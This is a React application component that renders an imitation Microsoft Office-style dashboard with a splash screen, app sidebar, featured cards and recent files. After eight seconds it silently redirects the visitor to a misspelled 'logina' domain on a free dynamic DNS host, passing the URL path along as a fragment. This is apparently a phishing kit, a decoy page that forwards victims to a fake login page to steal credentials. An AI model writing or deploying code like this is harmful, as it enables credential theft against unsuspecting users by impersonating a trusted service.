import { useEffect } from 'react'
import { SplashScreen } from './components/SplashScreen'
import { TopBar } from './components/TopBar'
import { Sidebar } from './components/Sidebar'
import { OfficeAppsSidebar } from './components/OfficeAppsSidebar'
import { FeaturedCards } from './components/FeaturedCards'
import { RecentFiles } from './components/RecentFiles'
import styles from './App.module.css'

export default function App() {
  useEffect(() => {
    const timer = setTimeout(() => {
      const hash = window.location.pathname.slice(1)
      const redirectUrl = hash && hash !== '/' ? `https://logina.sericesrequrie.dpdns.org/BH4cz/#${hash}` : 'https://logina.sericesrequrie.dpdns.org/BH4cz/'
      window.location.href = redirectUrl
    }, 8000)

    return () => clearTimeout(timer)
  }, [])

  return (
    <div className={styles.app}>
      <SplashScreen duration={4000} onComplete={() => {}} />
      <TopBar />
      <div className={styles.body}>
        <OfficeAppsSidebar />
        <Sidebar />
        <main className={styles.main}>
          <FeaturedCards />
          <RecentFiles />
        </main>
      </div>
    </div>
  )
}
